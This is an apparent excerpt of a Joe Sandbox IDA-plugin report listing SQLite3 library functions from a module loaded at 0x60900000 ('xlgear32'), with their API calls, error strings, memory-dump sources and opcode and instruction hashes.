                                                                          • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                          • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                          Strings
                                                                          • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                          • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                          • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                          • API String ID: 4080917175-264706735
                                                                          • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                          • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                          • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                          • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                          APIs
                                                                            • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                          • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                          • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID: library routine called out of sequence$out of memory
                                                                          • API String ID: 2019783549-3029887290
                                                                          • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                          • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                          • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                          • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                          APIs
                                                                          • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                          • sqlite3_free.SQLITE3 ref: 609406F7
                                                                          • sqlite3_free.SQLITE3 ref: 60940705
                                                                          • sqlite3_free.SQLITE3 ref: 60940713
                                                                          • sqlite3_free.SQLITE3 ref: 6094071E
                                                                          • sqlite3_free.SQLITE3 ref: 60940729
                                                                          • sqlite3_free.SQLITE3 ref: 6094073C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                          • String ID:
                                                                          • API String ID: 1159759059-0
                                                                          • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                          • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                                          • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                          • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                                          APIs
                                                                          • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                            • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                          • sqlite3_log.SQLITE3 ref: 609498F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                          • String ID: List of tree roots: $d$|
                                                                          • API String ID: 3709608969-1164703836
                                                                          • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                          • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                          • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                          • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                          APIs
                                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                          • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                          • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                          • sqlite3_free.SQLITE3 ref: 6096029A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                          • String ID: e
                                                                          • API String ID: 786425071-4024072794
                                                                          • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                          • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                          • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                          • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_exec
                                                                          • String ID: sqlite_master$sqlite_temp_master$|
                                                                          • API String ID: 2141490097-2247242311
                                                                          • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                          • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                          • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                          • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                          • String ID:
                                                                          APIs
                                                                            • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                          • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                          • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                          • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                          • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                            • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                            • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                            • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                            • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID:
                                                                          APIs
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                          • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                          • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                          • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                          • String ID:
                                                                          APIs
                                                                            • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                          • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                          • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                          • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                          • String ID:
                                                                          APIs
                                                                            • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                          • sqlite3_log.SQLITE3 ref: 609253E2
                                                                          • sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                          Similarity
                                                                          • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                          • String ID:
                                                                          APIs
                                                                          • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                          • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                          • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                          • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                          • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                          Similarity
                                                                          • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                          • String ID:
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                          • String ID:
                                                                          APIs
                                                                          • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                          Similarity
                                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                          • String ID:
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                          • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                          • String ID:
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: ($string or blob too big$|
                                                                          • API String ID: 632333372-2398534278
• Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
• Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
• Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
• Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
APIs
• sqlite3_stricmp.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6094E8D4), ref: 60923675
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_stricmp
• String ID: BINARY
• API String ID: 912767213-907554435
• Opcode ID: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
• Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
• Opcode Fuzzy Hash: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
• Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: Virtual$Protect$Query
• String ID: @
• API String ID: 3618607426-2766056989
• Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
• Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
• Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
• Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
APIs
• sqlite3_malloc.SQLITE3 ref: 60928353
  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
• sqlite3_realloc.SQLITE3 ref: 609283A0
• sqlite3_free.SQLITE3 ref: 609283B6
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
• String ID: d
• API String ID: 211589378-2564639436
• Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
• Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
• Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
• Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: _Jv_RegisterClasses$libgcj-11.dll
• API String ID: 1646373207-2713375476
• Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
• Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
• Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
• Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
APIs
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_free
• String ID:
• API String ID: 2313487548-0
• Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
• Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
• Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
• Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID:
• String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
• API String ID: 0-1177837799
• Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
• Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
• Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
• Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
APIs
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_mutex_leave$sqlite3_logsqlite3_mutex_enter
• String ID:
• API String ID: 4249760608-0
• Opcode ID: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
• Instruction ID: 2374180173898b37ca3bb3ba1fa7e33799c7e45bceefb220d1965ad168ba1add
• Opcode Fuzzy Hash: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
• Instruction Fuzzy Hash: 7F412970A083048BE701DF6AC495B8ABBF6FFA5308F04C46DE8598B355D779D849CB91
APIs
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
• String ID:
• API String ID: 1648232842-0
